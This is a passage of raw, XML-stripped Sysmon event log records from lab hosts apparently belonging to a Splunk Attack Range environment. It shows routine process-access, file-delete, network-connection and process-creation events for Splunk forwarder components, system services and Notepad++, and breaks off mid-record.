10:56:21.950{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18722018D03425E2AA58FC4C7C90D7EC,SHA256=9BA5A7D7DEBDEA636FFE752A580061C69E381C413CA36D5A8C996E8D2D6ACEDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:19.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53555-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000289929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.406{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12D5-6216-4905-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.406{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-12D5-6216-4905-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.406{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12D5-6216-4905-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.409{C8EA50B7-12D5-6216-4905-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.244{C8EA50B7-12D4-6216-4805-000000003802}64646460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:21.019{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E30AA967BAD73DDE40A138D0D9850516,SHA256=9A485B36C3572F723379CC9E77C48186F7D6F96492F7734CABE0F3AC6FF67AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:22.966{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6A3BD3BA565BF5CCD720520F156CD79,SHA256=123295251D1EE66F13745748290630C539AC319400C3D6C33BBC89684C7BFBE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:20.522{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:20b3:19bc:f5ff:fef0win-host-tcontreras-attack-range-985546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x8000000000000000217610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:19.709{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51406-false10.0.1.12-8000- 23542300x8000000000000000289931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:22.022{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DD0C5DA0916D7F2A5C292A91E3C7181,SHA256=3F1BD6A1DFD19AC8445FF33DA5641D7054837C5864633915B7C1A7B5755C5923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:23.981{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6E672073266B0993C3A01244B69ADE0,SHA256=C90506FAACE67E33A1D83C4317158C31F71AAA9336EFD5A2223B386036280098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:23.057{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D8D3439F54C6C26B35E8E7297F7C80E,SHA256=10FA2F1BED6FEC47E8C12178C3598974B43BCA942A0A1EA02BD841400D90135C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.941{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.941{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.941{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.809{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.809{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.809{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.809{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.696{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-139MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.406{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12D8-6216-4A05-000000003802}2640C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.406{C8EA50B7-F2AD-6215-C000-000000003802}48565992C:\Windows\Explorer.EXE{C8EA50B7-12D8-6216-4A05-000000003802}2640C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+17c35c|C:\Windows\System32\SHELL32.dll+19eb28|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17c600|C:\Windows\System32\SHELL32.dll+179a7e|C:\Windows\System32\SHELL32.dll+73861|C:\Windows\System32\SHELL32.dll+76746|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x8000000000000000289934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.413{C8EA50B7-12D8-6216-4A05-000000003802}2640C:\Program Files\Notepad++\notepad++.exe8.31Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\a546814787b4fb69487d08cd10ee995cac2995cb"C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=22E0726AC6C0C0F02C23DED4EAB8D2AA,SHA256=29BF69434A4DDBF59B4E3C3204A2C578A4F3496AAB1B6D146A0A24F899001420,IMPHASH=02B57A4AEE77BD45F4E2BA098351FBBA{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000289933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:24.078{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0812C2A06AE45FA5597A8D7664A04C17,SHA256=D16309F87AC3BE37FFBD4E0ED44B8FC28B901F5337B7BC41E30C57DC92F82196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.766{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla 